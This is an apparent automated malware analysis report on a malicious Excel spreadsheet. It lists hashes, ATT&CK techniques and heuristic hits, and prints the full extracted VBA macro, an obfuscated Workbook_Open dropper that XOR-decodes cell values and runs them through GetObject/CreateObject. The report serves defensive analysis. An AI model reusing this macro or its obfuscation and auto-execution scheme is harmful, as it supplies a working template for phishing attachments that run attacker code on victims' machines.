Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 6a35ca6a8e45f2ca…

MALICIOUS

Office (OLE) / .XLS

Size: 41.0 KB
Created: 2023-05-08 01:01:39
Authoring application: Microsoft Excel
First seen: 2023-05-10
MD5: 3533540579de820ccd11e9027c2cbdc2
SHA-1: e25d656cbbbc327cca7813959a4d5dd87b36d250
SHA-256: 6a35ca6a8e45f2ca48f66a0fe264526abbf9719b83304aea82e47e8a75ba51dc
Risk Score: 148

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The file is a malicious Excel spreadsheet containing VBA macros. The Workbook_Open macro is designed to execute obfuscated code. This code retrieves values from specific cells in the 'k513' sheet, which are likely used to construct a command to download and execute a second-stage payload. The use of CreateObject and GetObject within the macro indicates an attempt to interact with the system to run external code.

Heuristics (5)

  • VBA macros detected | medium | 4 related findings | OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call | high | OLE_VBA_CREATEOBJ
    Matched line in script:
    GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0
  • GetObject call | high | OLE_VBA_GETOBJ
    Matched line in script:
    GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0
  • VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro | low | OLE_VBA_WBOPEN
    Matched line in script:
    Sub Workbook_Open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4590 bytes

SHA-256 (macros.bas): 4603ba105978c2b51985c71a5456987007c8e9ea55fc51d09ab611baf1c60d07
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





             Private Proxy As String
Private PhiliP As String





                                            Private Mitchell As String






                                                        





          Private PreParing As Object








                                                                Private Sub Wanna()
Dim Determining As String, SubmiSSionS As String, Naturally As String
GoTo SubmiSSionS





           




Resolve:
Determining = Trembl(Proxy): SubmiSSionS = Trembl(PhiliP): Naturally = Trembl(Mitchell)
GoTo Repeated
SubmiSSionS:







                                                







                                                    Proxy = Sheets("k513").Range("J109").Value: PhiliP = Sheets("k513").Range("G171").Value: Mitchell = Sheets("k513").Range("H198").Value








                






                                            GoTo Resolve








             






Repeated:
GetObject(Determining).CreateObject(Naturally).Run SubmiSSionS, 0







                  End Sub





                   Sub Workbook_Open()
GoTo Boundary
Dim Brochure As String
Brochure = InputBox("your name")







                                        Dim Coalition As String








                                                







                                                                        Coalition = InputBox("last name")
MsgBox Brochure








                                                                MsgBox Coalition
Boundary:






                 If Brochure = "" Then
Wanna
End If
End Sub
Private Function Trembl(ByVal Refine As String) As Variant







                                        Dim Florists As Long: Florists = 0: Dim Jelsoft() As Byte: Dim Roots() As Byte, AllocAtion As String, CruCial As Integer







                                                                            Roots = "xec12fe254"
GoTo Barcelona
LegisLature:
Dim Coalition As String
Coalition = InputBox("enter your age")








            MsgBox Coalition
Celebrities:
If Florists < UBound(Jelsoft) Then
CruCial = Florists Mod (10)
GoTo Determining
SubmiSSionS:
AllocAtion = AllocAtion & Chr(Jelsoft(Florists))
Florists = Florists + 1
GoTo Celebrities





                                            Else
GoTo Netscape
End If
Choosing:







          MsgBox "error -67841"





                                            Dim Brochure As String
Brochure = InputBox("")





                                                                MsgBox Brochure
Netscape:








            Trembl = AllocAtion
Exit Function
Barcelona:
Jelsoft = Dimensional(Refine)







                                                            GoTo Celebrities







Determining:
Jelsoft(Florists) = Abs(Jelsoft(Florists) Xor Roots(CruCial * 2))







                                                            




                                                        




            GoTo SubmiSSionS





                 End Function
Private Function Dimensional(ByVal Choosing As String) As Variant
Dim AllocAtion() As Byte, i As Long, CruCial As Integer
i = 0: ReDim AllocAtion(0 To (Len(Choosing) / 2)) As Byte





Brochure:





                                                        If i < Len(Choosing) Then
CruCial = CruCial + 1
AllocAtion(CruCial - 1) = Chr(14 + ((8 + 4) * 2)) & "H" & Mid(Choosing, i + 1, 2)





             i = i + 2
GoTo Brochure







                 Else
GoTo Coalition
End If
Coalition:







           







                                                            Dimensional = AllocAtion
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True